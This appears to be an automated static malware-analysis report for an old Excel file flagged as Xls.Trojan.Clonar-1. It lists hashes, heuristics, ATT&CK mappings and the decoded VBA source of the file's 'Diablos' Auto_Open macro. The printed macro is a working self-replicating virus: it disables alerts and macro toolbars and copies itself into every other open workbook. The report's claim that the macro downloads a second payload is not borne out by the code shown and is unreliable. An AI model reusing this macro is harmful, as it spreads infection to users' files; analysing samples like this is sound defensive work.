Xls.Trojan.Clonar-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 1e35525ded6b34de…

MALICIOUS

Office (OLE)

42.5 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 55afdc848e4d90e6e318dfef65fd6f20 SHA-1: 2dd7b8c26e252925d95436eaed60e70957077767 SHA-256: 1e35525ded6b34de2f1713239b6b0a7624a7fee43314a20d02938049c99e7368
300 Risk Score

Malware Insights

Xls.Trojan.Clonar-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This Excel file contains a critical Auto_Open VBA macro, indicating it is designed to execute malicious code upon opening. The presence of ClamAV detections for 'Xls.Trojan.Clonar-1' strongly suggests a known trojan family. The macro's likely purpose is to download and execute a secondary payload, a common technique for this type of threat.

Heuristics 6

  • ClamAV: Xls.Trojan.Clonar-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Clonar-1
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 18,776 bytes but its declared streams total only 0 bytes — 18,776 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2978 bytes
SHA-256: eab0d60a590e10ef0091610b1b5657f576248a95e93c507b87f65da47f531e97
Detection
ClamAV: Xls.Trojan.Clonar-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Diablos"
' Diablos Macro
' Bios Virus Macro - (C) Copyright 1998 - Spalaci

Sub auto_open()
Attribute auto_open.VB_Description = "Macro grabada el 5/07/98 por Epson"
Attribute auto_open.VB_ProcData.VB_Invoke_Func = "D\n14"

' Disable Menssages
  Application.DisplayAlerts = False

' Disable Tools + Keys
  Set Bar1 = CommandBars("Macro")
  Bar1.Enabled = False
  Set Bar2 = CommandBars("Visual Basic")
  Bar2.Enabled = False
    
' Clonar Codigo Diablos
  ThisWorkbook.VBProject.VBComponents("Diablos").Export ("C:\Windows\Diablos.bas")
    
' Clean + Infeccion
  For Each I In Workbooks
      If I.Name <> ThisWorkbook.Name Then
         For Each J In I.VBProject.VBComponents
             If J.Name = "Diablos" Then
                I.VBProject.VBComponents.Remove I.VBProject.VBComponents("Diablos")
             End If
         Next J
         I.VBProject.VBComponents.Import ("C:\Windows\Diablos.bas")
      End If
  Next I

' Label
  If Day(Date) = 30 Then
     CommandBars.LargeButtons = True
  End If
  
' Enable Messages
  Application.DisplayAlerts = True
  
End Sub
embedded_office_off000060a8.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x60A8 18776 bytes
SHA-256: e5fef41f8d67b80e6d57c6eaa487fa52b4e4231b9bc57c7394ac9d85e82453c4